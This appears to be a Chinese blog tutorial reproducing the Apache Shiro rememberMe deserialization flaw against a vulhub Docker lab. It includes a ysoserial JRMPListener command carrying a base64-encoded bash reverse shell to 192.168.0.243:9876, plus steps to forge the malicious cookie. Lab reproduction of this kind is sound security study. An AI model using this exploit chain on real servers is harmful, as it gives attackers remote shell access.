返回

shiro反序列化漏洞复现

发布时间:2022-03-24 13:55:07 535
# 漏洞

一、搭建环境

直接重vulhub上拉取环境
docker pull medicean/vulapps:s_shiro_1

docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1

二、漏洞复现

方法一、直接工具复现


方法二、手工复现

使用burp抓取数据包
在cookies参数添加;rememberMe=1
查看返回包

如果存在remberMe=deleteMe则说明使用了shoir
使用http://www.jackson-t.ca/runtime-exec-payloads.html 红队反弹shell脚本进行编码

使用ysoserial中的jrmp监听模块

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMjQzLzk4NzYgMD4mMQ==}|{base64,-d}|{bash,-i}"


使用payload生成马

监听端口

将cookies 改为生成的rememberMe

发送,监听成功

特别声明:以上内容(图片及文字)均为互联网收集或者用户上传发布,本站仅提供信息存储服务!如有侵权或有涉及法律问题请联系我们。
举报
评论区(0)
按点赞数排序
用户头像
精选文章
thumb 中国研究员首次曝光美国国安局顶级后门—“方程式组织”
thumb 俄乌线上战争,网络攻击弥漫着数字硝烟
thumb 从网络安全角度了解俄罗斯入侵乌克兰的相关事件时间线